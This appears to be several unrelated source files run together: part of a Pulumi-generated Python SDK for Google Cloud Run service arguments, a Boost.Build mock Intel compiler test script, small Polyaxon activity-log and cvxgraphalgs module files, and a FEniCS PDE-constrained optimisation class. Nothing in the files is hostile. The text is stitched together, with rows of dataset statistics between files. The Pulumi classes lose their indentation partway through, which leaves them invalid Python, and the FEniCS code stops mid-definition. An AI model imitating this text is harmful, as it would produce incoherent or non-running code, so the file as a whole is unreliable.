    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerPortArgs:
    def __init__(__self__, *,
                 container_port: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 protocol: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] container_port: Port number the container listens on. This must be a valid port number, 0 < x < 65536.
        :param pulumi.Input[str] name: Volume's name.
        :param pulumi.Input[str] protocol: Protocol for port. Must be "TCP". Defaults to "TCP".
        """
        # Record only the arguments that were explicitly supplied.
        for attr, arg in (("container_port", container_port),
                          ("name", name),
                          ("protocol", protocol)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="containerPort")
    def container_port(self) -> Optional[pulumi.Input[int]]:
        """
        Port number the container listens on. This must be a valid port number, 0 < x < 65536.
        """
        stored = pulumi.get(self, "container_port")
        return stored

    @container_port.setter
    def container_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "container_port", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        """
        Protocol for port. Must be "TCP". Defaults to "TCP".
        """
        stored = pulumi.get(self, "protocol")
        return stored

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)
@pulumi.input_type
class ServiceTemplateSpecContainerResourcesArgs:
    def __init__(__self__, *,
                 limits: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 requests: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] limits: Limits describes the maximum amount of compute resources allowed.
               The values of the map is string form of the 'quantity' k8s type:
               https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] requests: Requests describes the minimum amount of compute resources required.
               If Requests is omitted for a container, it defaults to Limits if that is
               explicitly specified, otherwise to an implementation-defined value.
               The values of the map is string form of the 'quantity' k8s type:
               https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
        """
        # Record only the arguments that were explicitly supplied.
        for attr, arg in (("limits", limits), ("requests", requests)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def limits(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Limits describes the maximum amount of compute resources allowed.
        The values of the map is string form of the 'quantity' k8s type:
        https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
        """
        stored = pulumi.get(self, "limits")
        return stored

    @limits.setter
    def limits(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "limits", value)

    @property
    @pulumi.getter
    def requests(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Requests describes the minimum amount of compute resources required.
        If Requests is omitted for a container, it defaults to Limits if that is
        explicitly specified, otherwise to an implementation-defined value.
        The values of the map is string form of the 'quantity' k8s type:
        https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
        """
        stored = pulumi.get(self, "requests")
        return stored

    @requests.setter
    def requests(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "requests", value)
@pulumi.input_type
class ServiceTemplateSpecContainerVolumeMountArgs:
    def __init__(__self__, *,
                 mount_path: pulumi.Input[str],
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] mount_path: Path within the container at which the volume should be mounted. Must
               not contain ':'.
        :param pulumi.Input[str] name: Volume's name.
        """
        # Both fields are required, so both are always recorded.
        for attr, arg in (("mount_path", mount_path), ("name", name)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="mountPath")
    def mount_path(self) -> pulumi.Input[str]:
        """
        Path within the container at which the volume should be mounted. Must
        not contain ':'.
        """
        stored = pulumi.get(self, "mount_path")
        return stored

    @mount_path.setter
    def mount_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "mount_path", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
secret: pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']):
"""
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input['ServiceTemplateSpecVolumeSecretArgs'] secret: The secret's value will be presented as the content of a file whose
name is defined in the item path. If no items are defined, the name of
the file is the secret_name.
Structure is documented below.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def secret(self) -> pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']:
"""
The secret's value will be presented as the content of a file whose
name is defined in the item path. If no items are defined, the name of
the file is the secret_name.
Structure is documented below.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeSecretArgs:
def __init__(__self__, *,
secret_name: pulumi.Input[str],
default_mode: Optional[pulumi.Input[int]] = None,
items: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]] = None):
"""
:param pulumi.Input[str] secret_name: The name of the secret in Cloud Secret Manager. By default, the secret
is assumed to be in the same project.
If the secret is in another project, you must define an alias.
An alias definition has the form:
<alias>:projects/<project-id|project-number>/secrets/<secret-name>.
If multiple alias definitions are needed, they must be separated by
commas.
The alias definitions must be set on the run.googleapis.com/secrets
annotation.
:param pulumi.Input[int] default_mode: Mode bits to use on created files by default. Must be a value between 0000
and 0777. Defaults to 0644. Directories within the path are not affected by
this setting. This might be in conflict with other options that affect the
file mode, like fsGroup, and the result can be other mode bits set.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]] items: If unspecified, the volume will expose a file whose name is the
secret_name.
If specified, the key will be used as the version to fetch from Cloud
Secret Manager and the path will be the name of the file exposed in the
volume. When items are defined, they must specify a key and a path.
Structure is documented below.
"""
pulumi.set(__self__, "secret_name", secret_name)
if default_mode is not None:
pulumi.set(__self__, "default_mode", default_mode)
if items is not None:
pulumi.set(__self__, "items", items)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> pulumi.Input[str]:
"""
The name of the secret in Cloud Secret Manager. By default, the secret
is assumed to be in the same project.
If the secret is in another project, you must define an alias.
An alias definition has the form:
<alias>:projects/<project-id|project-number>/secrets/<secret-name>.
If multiple alias definitions are needed, they must be separated by
commas.
The alias definitions must be set on the run.googleapis.com/secrets
annotation.
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter(name="defaultMode")
def default_mode(self) -> Optional[pulumi.Input[int]]:
"""
Mode bits to use on created files by default. Must be a value between 0000
and 0777. Defaults to 0644. Directories within the path are not affected by
this setting. This might be in conflict with other options that affect the
file mode, like fsGroup, and the result can be other mode bits set.
"""
return pulumi.get(self, "default_mode")
@default_mode.setter
def default_mode(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_mode", value)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]]:
"""
If unspecified, the volume will expose a file whose name is the
secret_name.
If specified, the key will be used as the version to fetch from Cloud
Secret Manager and the path will be the name of the file exposed in the
volume. When items are defined, they must specify a key and a path.
Structure is documented below.
"""
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]]):
pulumi.set(self, "items", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeSecretItemArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
path: pulumi.Input[str],
mode: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] key: The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
:param pulumi.Input[str] path: The relative path of the file to map the key to.
May not be an absolute path.
May not contain the path element '..'.
May not start with the string '..'.
:param pulumi.Input[int] mode: Mode bits to use on this file, must be a value between 0000 and 0777. If
not specified, the volume defaultMode will be used. This might be in
conflict with other options that affect the file mode, like fsGroup, and
the result can be other mode bits set.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "path", path)
if mode is not None:
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
The relative path of the file to map the key to.
May not be an absolute path.
May not contain the path element '..'.
May not start with the string '..'.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[int]]:
"""
Mode bits to use on this file, must be a value between 0000 and 0777. If
not specified, the volume defaultMode will be used. This might be in
conflict with other options that affect the file mode, like fsGroup, and
the result can be other mode bits set.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "mode", value)
@pulumi.input_type
class ServiceTrafficArgs:
def __init__(__self__, *,
percent: pulumi.Input[int],
latest_revision: Optional[pulumi.Input[bool]] = None,
revision_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] percent: Percent specifies percent of the traffic to this Revision or Configuration.
:param pulumi.Input[bool] latest_revision: LatestRevision may be optionally provided to indicate that the latest ready
Revision of the Configuration should be used for this traffic target. When
provided LatestRevision must be true if RevisionName is empty; it must be
false when RevisionName is non-empty.
:param pulumi.Input[str] revision_name: RevisionName of a specific revision to which to send this portion of traffic.
"""
pulumi.set(__self__, "percent", percent)
if latest_revision is not None:
pulumi.set(__self__, "latest_revision", latest_revision)
if revision_name is not None:
pulumi.set(__self__, "revision_name", revision_name)
@property
@pulumi.getter
def percent(self) -> pulumi.Input[int]:
"""
Percent specifies percent of the traffic to this Revision or Configuration.
"""
return pulumi.get(self, "percent")
@percent.setter
def percent(self, value: pulumi.Input[int]):
pulumi.set(self, "percent", value)
@property
@pulumi.getter(name="latestRevision")
def latest_revision(self) -> Optional[pulumi.Input[bool]]:
"""
LatestRevision may be optionally provided to indicate that the latest ready
Revision of the Configuration should be used for this traffic target. When
provided LatestRevision must be true if RevisionName is empty; it must be
false when RevisionName is non-empty.
"""
return pulumi.get(self, "latest_revision")
@latest_revision.setter
def latest_revision(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "latest_revision", value)
@property
@pulumi.getter(name="revisionName")
def revision_name(self) -> Optional[pulumi.Input[str]]:
"""
RevisionName of a specific revision to which to send this portion of traffic.
"""
return pulumi.get(self, "revision_name")
@revision_name.setter
def revision_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revision_name", value)
| 42.845164
| 167
| 0.654317
| 10,492
| 89,932
| 5.500572
| 0.052516
| 0.092442
| 0.05919
| 0.044601
| 0.851989
| 0.798985
| 0.771486
| 0.724598
| 0.70637
| 0.673551
| 0
| 0.001314
| 0.246698
| 89,932
| 2,098
| 168
| 42.865586
| 0.850574
| 0.364698
| 0
| 0.585562
| 1
| 0
| 0.136475
| 0.073078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205882
| false
| 0
| 0.004456
| 0.022282
| 0.326203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
314d6c458d80988073b9bf9f64160774e96af8cb
| 5,732
|
py
|
Python
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
#
# Copyright 2017 Steven Watanabe
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from MockProgram import *
command('icc', '-print-prog-name=ar', stdout=script('ar.py'))
command('icc', '-print-prog-name=ranlib', stdout=script('ranlib.py'))
# all builds are multi-threaded for darwin
if allow_properties("variant=debug", "link=shared", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-fPIC'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/debug/target-os-darwin/lib.o'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-fPIC'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/target-os-darwin/libl1.dylib'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
if allow_properties("variant=release", "link=shared", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O3', '-inline-level=2', '-w1', '-vec-report0', '-fPIC'), '-DNDEBUG', '-c', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/release/target-os-darwin/lib.o'), unordered(ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
command('icc', '-xc++', unordered('-O3', '-inline-level=2', '-w1', '-vec-report0', '-fPIC'), '-DNDEBUG', '-c', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/release/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/release/target-os-darwin/libl1.dylib'), unordered(ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
if allow_properties("variant=debug", "link=static", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/libl1.a'), '-g', ordered('-shared-intel', '-lstdc++', '-lpthread'))
if allow_properties("variant=debug", "link=static", "runtime-link=static"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/libl1.a'), unordered('-g', ordered('-static', '-static-intel', '-lstdc++', '-lpthread'), '-static'))
if allow_properties("variant=debug", "link=shared", "runtime-link=shared", "architecture=x86", "address-model=32"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-march=i686', '-fPIC', '-m32'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/lib.o'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-march=i686', '-fPIC', '-m32'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-march=i686', '-fPIC', '-m32'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/libl1.dylib'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-march=i686', '-fPIC', '-m32'))
main()
| 130.272727
| 411
| 0.670796
| 874
| 5,732
| 4.33524
| 0.114416
| 0.057271
| 0.098179
| 0.147268
| 0.908947
| 0.896807
| 0.886778
| 0.87886
| 0.87886
| 0.854579
| 0
| 0.035728
| 0.062456
| 5,732
| 43
| 412
| 133.302326
| 0.669334
| 0.040998
| 0
| 0
| 0
| 1.074074
| 0.600838
| 0.342503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.037037
| 0
| 0.037037
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
31774d11f1a5718a8affdbbdc8f9ef93ccf959d9
| 242
|
py
|
Python
|
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
import activitylogs
from event_manager.events import notebook
activitylogs.subscribe(notebook.NotebookStartedTriggeredEvent)
activitylogs.subscribe(notebook.NotebookSoppedTriggeredEvent)
activitylogs.subscribe(notebook.NotebookViewedEvent)
| 30.25
| 62
| 0.900826
| 20
| 242
| 10.85
| 0.55
| 0.290323
| 0.400922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 242
| 7
| 63
| 34.571429
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
31d9438a72f9fa3f4c37b019dcab7c5a0b22af82
| 100
|
py
|
Python
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/cvx-graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | 7
|
2020-05-11T10:01:31.000Z
|
2021-11-16T16:08:29.000Z
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | 1
|
2020-05-12T16:15:33.000Z
|
2020-06-05T16:40:57.000Z
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/cvx-graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | null | null | null |
from cvxgraphalgs.algorithms.independent_set import *
from cvxgraphalgs.algorithms.max_cut import *
| 33.333333
| 53
| 0.86
| 12
| 100
| 7
| 0.666667
| 0.380952
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 54
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73093338aaebcf99b3b8f0903493c0a502e7fa62
| 15,483
|
py
|
Python
|
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
from fenics import *
import matplotlib.pyplot as plt
import numpy as np
class PDEConsOptProblem:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
"""
Sets up the 'hello world' PDE-constrained optimisation problem
Inputs:
N: number of finite elements in mesh
p: order of function space
ue: Desired distribution (UFL expression)
alpha: regularisation parameter
"""
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, "CG", p)
self.ud = interpolate(ue , V)
self.lmbd = interpolate(Constant(1.0), V)
self.m = interpolate(Constant(1.0), V)
self.mt = Function(V)
self.RdJ = Function(V)
self.u = Function(V)
self.u_k = Function(V)
self.alpha = alpha
self.bc = DirichletBC(V, 0., "on_boundary")
v = TestFunction(V)
#form of state equation
u_ = TrialFunction(V)
self.F = inner(grad(u_), grad(v))*dx - self.m*v*dx
#form of adjoint
lmbd_ = TrialFunction(V)
self.F_adj = inner(grad(lmbd_), grad(v))*dx + (self.u - self.ud)*v*dx
# form of dJ = (RdJ, v)
RdJ_ = TrialFunction(V)
self.F_R = RdJ_*v*dx - (self.alpha*self.m - self.lmbd)*v*dx
#form of objective functional
#self.J_form = 0.5*((self.u - ud)**2 + self.alpha*self.m**2)*dx
def solve_state(self):
a,L = lhs(self.F), rhs(self.F)
solve(a == L, self.u, self.bc)
def solve_adjoint(self):
a,L = lhs(self.F_adj), rhs(self.F_adj)
solve(a == L, self.lmbd, self.bc)
def compute_RieszRep(self):
self.solve_state()
self.solve_adjoint()
a,L = lhs(self.F_R), rhs(self.F_R)
solve(a == L, self.RdJ)
def step_SD(self, step):
self.m.assign(self.m - step*self.RdJ)
def J(self, m):
return 0.5*((self.u - self.ud)**2 + self.alpha*m**2)*dx
def eval_J(self, m):
self.solve_state()
return assemble(self.J(m))
def solveSD(self, step = 500., iterTol = 1.0e-5, maxIter = 25,
dispOutput = False, writeData = False, filePath = 'solution-data/PDEOptSD'):
"""
Solves the PDE-constrained opt. problem using steepest descent (SD)
Inputs:
step: initial SD step-size (will be reduced to satisfy Armijo condition)
iterTol: Iterations stop when J < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput (bool): display iteration differences and objective values at each iteration
writeData (bool): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
[u: optimal state function
m: optimal control function
lmbd: Lagrange multiplier]
[mDiff: differences between iterative solutions (in H1 norm) at each iteration
Jk: objective value at each iteration
RdJk: H1 norm of Riesz rep. of dJ at each iteration (SD direction)
NOT IMPLEMENTED: refErr: H1 norms ||m_k-m_ref||.
Will be an empty array if calculateRef method has not been run]
Saved data:
u saved to <filePath>_u.pvd
m saved to <filePath>_m.pvd
lmbd saved to <filePath>_lmbd.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
"""
# perform one step outside of loop to ensure intial values satisfy constraints
Jk = [self.eval_J(self.m)]
mDiff = []
RdJk = []
iter = 0
while Jk[-1] > iterTol and iter < maxIter:
iter += 1
self.compute_RieszRep()
# trial step
self.mt.assign(self.m - step*self.RdJ)
# Frechet derivative of J at point m (previous iterate) in direction GJ, used for b-Armijo
armijo = assemble(-(self.alpha*self.m - self.lmbd)*self.RdJ*dx)
Jt = self.eval_J(self.m)
# require sufficent decrease (Armijo condition)
while Jt > (Jk[-1] + 0.1*step*armijo) and step > 1e-20 and iter > 1:
step = 0.75*step
# trial step with smaller step-size
self.mt.assign(self.m - step*self.RdJ)
Jt = self.eval_J(self.mt)
print 'Step-size set to: ' + str(step)
print 'J_trial = ' + str(Jt)
if step > 1e-20:
# step successful, update control
mDiff.append(errornorm(self.mt, self.m, 'H1'))
RdJk.append(norm(self.RdJ, 'H1'))
self.step_SD(step)
Jk.append(Jt)
else:
print 'Step-size reduced below threshold, convergence failed (?)'
if dispOutput:
print ('k = ' + str(iter) + ' | J = ' + str(Jk[-1]) + ' | norm(m) = '
+ str(norm(self.m, 'H1')) + ' | norm(R(dJ)) = ' + str(norm(self.RdJ, 'H1')))
# remove initial value
Jk.pop(0)
if writeData:
# save solution
solution = File(filePath + '_u.pvd')
solution << self.u
solution = File(filePath + '_m.pvd')
solution << self.m
solution = File(filePath + '_lmbd.pvd')
solution <<self. lmbd
# save convergence data
convergenceData = [mDiff, Jk, RdJk, refErr]
np.savetxt(filePath + '.csv', convergenceData)
return [self.u, self.m, self.lmbd], [mDiff, Jk, RdJk] #, refErr]
class nonlinPDECOP:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
"""
Sets up the 'hello world' PDE-constrained optimisation problem
Inputs:
N: number of finite elements in mesh
p: order of function space
ue: Desired distribution (UFL expression)
alpha: regularisation parameter
"""
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, "CG", p)
self.ud = interpolate(ue , V)
self.lmbd = interpolate(Constant(1.0), V)
self.m = interpolate(Constant(1.0), V)
self.mt = Function(V)
self.RdJ = Function(V)
self.u = Function(V)
self.u_k = Function(V)
self.du = Function(V)
self.alpha = alpha
# set up BCs on left and right
# lambda functions ensure the boundary methods take two variables
self.B1 = DirichletBC(V, Constant(0.0), lambda x, on_boundary : self.left_boundary(x, on_boundary)) # u(0) = 0
self.B2 = DirichletBC(V, Constant(1.0), lambda x, on_boundary : self.right_boundary(x, on_boundary)) # u(1) = 1
self.B2du = DirichletBC(V, Constant(0.0), lambda x, on_boundary : self.right_boundary(x, on_boundary))
self.bcdu = [self.B1, self.B2du] # bcs for du variational problem
self.bc = DirichletBC(V,0.,"on_boundary") # bcs for adjoint problem
v = TestFunction(V)
#form of state equation
# construct initial guess (solution to state eqn with q(u) = 1)
u_k_ = TrialFunction(V)
a0du = inner(grad(u_k_), grad(v))*dx
f = Constant(0.0)
L0du = f*v*dx
solve(a0du == L0du, self.u_k, [self.B1, self.B2])
# construct state eqn in du
du_ = TrialFunction(V) # newton step
